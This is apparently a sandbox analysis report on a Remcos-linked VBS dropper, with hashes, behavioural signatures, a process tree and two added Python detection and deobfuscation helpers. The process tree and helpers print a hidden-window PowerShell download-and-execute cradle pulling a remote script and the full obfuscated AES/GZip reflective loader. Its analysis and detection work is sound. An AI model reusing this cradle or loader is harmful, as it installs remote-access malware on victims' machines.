Analysis
max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
03-12-2024 22:47
Static task
static1
Behavioral task
behavioral1
Sample
ETL3M_remcos.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ETL3M_remcos.vbs
Resource
win10v2004-20241007-en
General
Target
ETL3M_remcos.vbs
Size
563KB
MD5
f7c17bfb4247e64e22dd52540a4b903b
SHA1
368ba4d02df294fa42efee5e4f330d5e7260d0c3
SHA256
23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
SHA512
5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
SSDEEP
12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with the display window hidden.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the victim's system language in order to infer the geographical location of the host.
Processes:
  description   ioc                                                          Process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
  pid   Process
  2964  powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
  pid   Process
  2188  powershell.exe
  2964  powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
  description              pid   Process
  Token: SeDebugPrivilege  2188  powershell.exe
  Token: SeDebugPrivilege  2964  powershell.exe
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
  description                        pid   Process      procid_target
  PID 1344 wrote to memory of 2188   1344  WScript.exe  28
  PID 1344 wrote to memory of 2188   1344  WScript.exe  28
  PID 1344 wrote to memory of 2188   1344  WScript.exe  28
  PID 1344 wrote to memory of 668    1344  WScript.exe  32
  PID 1344 wrote to memory of 668    1344  WScript.exe  32
  PID 1344 wrote to memory of 668    1344  WScript.exe  32
  PID 668 wrote to memory of 2796    668   cmd.exe      34
  PID 668 wrote to memory of 2796    668   cmd.exe      34
  PID 668 wrote to memory of 2796    668   cmd.exe      34
  PID 2796 wrote to memory of 2892   2796  cmd.exe      36
  PID 2796 wrote to memory of 2892   2796  cmd.exe      36
  PID 2796 wrote to memory of 2892   2796  cmd.exe      36
  PID 2796 wrote to memory of 2964   2796  cmd.exe      37
  PID 2796 wrote to memory of 2964   2796  cmd.exe      37
  PID 2796 wrote to memory of 2964   2796  cmd.exe      37
  PID 2796 wrote to memory of 2964   2796  cmd.exe      37
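The first signature (PowerShell started with a hidden window from a script host, running a download cradle) and the padded command line that follows later in the process tree are straightforward to turn into process-creation detection logic. The Python below is an added example, not the sandbox's own rule set: it tags each event with the features it matches and is run over three constructed events. The first reuses the WScript.exe to powershell.exe command line captured in this report, the second is a shortened form of the echo command line (six of its .Replace() entries plus the trailing powershell -w hidden), and the third is a benign control. Threshold and feature names are choices of this example.

```python
"""Process-creation detection for the PowerShell patterns flagged in this report.
Added example, not the sandbox's signature code. Events are constructed; the
command lines of the first two are taken from the process tree in the report."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# -WindowStyle Hidden, -w hidden, -w h
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
CRADLE_RE = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
# 'nameWITHjunk'.Replace('junk', '') -- the padding scheme used by this loader
REPLACE_PAD_RE = re.compile(r"'[^']*'\.Replace\('[^']*',\s*''\)", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def count_replace_padding(command_line: str) -> int:
    """Number of .Replace('junk', '') string-padding constructs in a command line."""
    return len(REPLACE_PAD_RE.findall(command_line))


def evaluate(ev: ProcEvent, replace_threshold: int = 5) -> list[str]:
    """Return the list of matched features for one process-creation event."""
    hits = []
    image = basename(ev.image)
    cl = ev.command_line
    mentions_ps = image in POWERSHELL_IMAGES or "powershell" in cl.lower()
    if image in POWERSHELL_IMAGES and basename(ev.parent_image) in SCRIPT_HOSTS:
        hits.append("script-host-parent")
    if mentions_ps and HIDDEN_RE.search(cl):
        hits.append("hidden-window")
    if CRADLE_RE.search(cl):
        hits.append("download-cradle")
    if IEX_RE.search(cl):
        hits.append("iex")
    if count_replace_padding(cl) >= replace_threshold:  # threshold is an assumption
        hits.append("replace-padding")
    return hits


# Constructed events (PIDs and parents follow the report's process tree).
EVENTS = [
    ProcEvent(2188, r"C:\Windows\System32\WScript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden "
              "-Command \"iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder"
              "/refs/heads/main/remcos.ps1' -UseBasicParsing)\""),
    ProcEvent(2892, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe",
              "cmd.exe /S /D /c\" echo $QkEK='SplexkUitexkU'.Replace('exkU', ''),"
              "'LHcgboadHcgb'.Replace('Hcgb', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),"
              "'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),"
              "'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', '');powershell -w hidden \""),
    ProcEvent(4100, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq Running\""),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev.pid, basename(ev.image), evaluate(ev) or "clean")
```

The hidden-window check deliberately fires on any command line that mentions powershell, not only on powershell.exe images, because in this sample the -w hidden switch lives inside the cmd.exe echo line while the PowerShell child (PID 2964) has no arguments at all.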
Processes
[depth 1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ETL3M_remcos.vbs"
  PID: 1344
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"
    PID: 2188
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [depth 2] C:\Windows\System32\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
    PID: 668
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
      PID: 2796
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "
        PID: 2892
      [depth 4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PID: 2964
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
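The depth-4 cmd.exe command line above is the whole second-stage loader in clear text. Every .NET member name is hidden only by splicing in a junk token and stripping it again with .Replace(); the two stage payloads are AES-CBC/PKCS7-encrypted and GZip-compressed; and they are read from n1.bat itself (the script sets the console title to the batch path, reads that file, takes lines 5 and 6, skips two characters and Base64-decodes), after which each is loaded with Assembly.Load and started through EntryPoint.Invoke. The following Python is an added triage helper, not code from the sandbox or from the sample: it recovers the $QkEK names by applying the same .Replace() calls, rewrites the indexed member accesses into readable PowerShell, checks the key and IV sizes, and mirrors the line-extraction step against a constructed stand-in for n1.bat. Python's standard library has no AES, so the decryption itself is left to a library such as cryptography; the '::' prefix on the payload lines of the stand-in is an assumption, since those two skipped characters are not visible in the report.

```python
"""Static triage of the .Replace()-padded PowerShell loader echoed by n1.bat.
Added example (not sandbox or malware code). Stdlib only: the AES-CBC stage is
not reimplemented here because Python's standard library has no AES; wire in a
library such as 'cryptography' once the names and blobs below are recovered."""
import base64
import re

# The $QkEK array literal, copied from the cmd.exe command line in the report.
OBFUSCATED_ARRAY = (
    "$QkEK='SplexkUitexkU'.Replace('exkU', ''),"
    "'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),"
    "'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),"
    "'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),"
    "'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),"
    "'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),"
    "'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),"
    "'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),"
    "'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),"
    "'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),"
    "'LHcgboadHcgb'.Replace('Hcgb', ''),"
    "'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),"
    "'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),"
    "'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');"
)
# Key and IV literals from the same command line.
KEY_B64 = "/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U="
IV_B64 = "Tm3jafLgvfKY6mYPS/HLjQ=="

# 'NAMEwithJUNK'.Replace('JUNK', '')  -> capture the padded name and the junk token
REPLACE_PAD_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")


def resolve_replace_strings(script: str) -> list[str]:
    """Recover each padded name by applying the same .Replace() the script would run."""
    return [padded.replace(junk, "") for padded, junk in REPLACE_PAD_RE.findall(script)]


def render_indexed_calls(script: str, array_name: str, names: list[str]) -> str:
    """Rewrite ($ARRAY[n]) member accesses as plain names so the loader reads as normal PowerShell."""
    pat = re.compile(r"\(\$" + re.escape(array_name) + r"\[(\d+)\]\)")
    return pat.sub(lambda m: names[int(m.group(1))], script)


def aes_parameter_sizes(key_b64: str, iv_b64: str) -> tuple[int, int]:
    """Byte lengths of the decoded key and IV (32 = AES-256 key, 16 = one CBC block)."""
    return len(base64.b64decode(key_b64)), len(base64.b64decode(iv_b64))


def locate_stage_blobs(bat_text: str, line_indices=(5, 6), skip=2) -> list[bytes]:
    """Mirror ReadLines(bat) -> ElementAt(n) -> Substring(2) -> FromBase64String.

    The loader sets the console title to its own .bat path and pulls the encrypted
    payloads out of that file, so n1.bat is both launcher and container. Which two
    leading characters are skipped is not visible in the report; treating them as a
    '::' batch comment marker is an assumption of this example. Output is still
    AES-CBC ciphertext of a GZip stream; decrypt, then gunzip, then Assembly.Load.
    """
    lines = bat_text.splitlines()
    return [base64.b64decode(lines[i][skip:]) for i in line_indices]


# Constructed stand-in for n1.bat (not the real file): lines 5 and 6 carry the blobs.
SAMPLE_BAT = "\n".join([
    "@echo off",
    "rem constructed sample line 1",
    "rem constructed sample line 2",
    "rem constructed sample line 3",
    "rem constructed sample line 4",
    "::" + base64.b64encode(b"STAGE-A-CIPHERTEXT").decode(),
    "::" + base64.b64encode(b"STAGE-B-CIPHERTEXT").decode(),
    "powershell -w hidden",
])

if __name__ == "__main__":
    names = resolve_replace_strings(OBFUSCATED_ARRAY)
    for i, n in enumerate(names):
        print(f"$QkEK[{i:2}] = {n}")
    print(render_indexed_calls(
        "[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null)",
        "QkEK", names))
    print("key bytes, iv bytes:", aes_parameter_sizes(KEY_B64, IV_B64))
    print(locate_stage_blobs(SAMPLE_BAT))
```

Resolved indices as used in the command line: [3] FromBase64String, [1] CreateDecryptor, [13] TransformFinalBlock, [4] Decompress, [6] CopyTo, [11] ReadLines, [12] ElementAt, [10] Load, [8] EntryPoint, [5] Invoke. Four names in the array (Split, MainModule, GetCurrentProcess, ChangeExtension) are never indexed in the captured command line. The key decodes to 32 bytes, so this is AES-256-CBC with a 16-byte IV hard-coded beside it. The process tree is consistent with the echoed script being piped into the SysWOW64 PowerShell (PID 2964), which is a 32-bit process; hunt for the reflectively loaded assemblies there, not in the 64-bit PowerShell that ran the download cradle.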
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
562KB
MD5
d1d99208a499e870e1e0a34a2cbba829
SHA1
85f7090ce76bdae0a07154b27117ec5ac9e9f673
SHA256
d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879
SHA512
badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LSBTZU62H2JS0QL4K0Y9.temp
Filesize
7KB
MD5
5017493d4117071e40b0ebdcfc586969
SHA1
e239bbfdcda139cb1eedcbe2b71f791312614c72
SHA256
360c61699a4cda2c942a7b972208cb1c319e173718db5da976c82764c6b5b2d1
SHA512
bde52cef83a8fb040038f8f1f8d648113683fd2ea3464cdf074bcce8ab078454d502bb1e07d69feeb52cbfabf2cfed4924182a3c6767cc7a861918faaec6903f